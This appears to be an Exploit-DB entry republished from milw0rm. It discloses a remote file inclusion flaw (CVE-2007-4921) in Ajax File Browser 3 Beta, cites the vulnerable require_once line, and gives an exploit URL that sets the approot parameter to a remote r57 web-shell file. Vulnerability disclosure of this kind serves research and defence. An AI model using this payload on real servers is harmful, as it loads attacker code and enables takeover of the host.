Ajax File Browser 3b - 'settings.inc.php?approot' Remote File Inclusion

Author: arfis project
type: webapps
platform: php
port: 
date_added: 2007-09-13  
date_updated: 2016-10-12  
verified: 1  
codes: OSVDB-38970;CVE-2007-4921  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comafb-3-beta-2007-08-28.zip  

raw file: 4405.txt  

Ajax File Browser 3 Beta Remote File Inclusion
##############################################

                                                found by the "arfis project"
                                                http://arfis.wordpress.com/

Project Info:
-------------
	Name: Ajax File Browser
	Link: http://sourceforge.net/projects/ajaxfb/
	DL:   http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip


Vulnerability Info:
-------------------
	File: _includes/settings.inc.php
	Line: 12
	Code: require_once($approot. _includes/functions_file.inc.php );


Exploit Example:
----------------
	http://localhost/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://localhost/r57.txt?


About arfis:
------------
	"arfis" stands for "automated Remote File Inclusion search". It's a perl script
	that automatically download and extract PHP projects from sourceforge.net. It then
	checks the project for RFI vulnerabilities, if found one it post's it to the arfis-
	blog, or database if you want to call it like that. Feel free to come around and
	find your own RFI:
	                   http://arfis.wordpress.com/

# milw0rm.com [2007-09-14]